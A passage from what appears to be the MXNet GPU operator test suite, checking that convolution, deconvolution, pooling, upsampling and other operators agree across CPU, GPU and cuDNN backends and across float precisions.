ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/7645")
@with_seed(1234)
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over the data sets of different float types is problematic
# as one max value in a float32 data set may not be the max value in a float16 data set.
# This function will not be called.
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool'))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=False, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=False,
name='pool'))
check_consistency(sym_list, ctx_list)
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_3d_pooling(pool_type):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_3d_pooling('max')
test_3d_pooling('avg')
test_3d_pooling('sum')
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
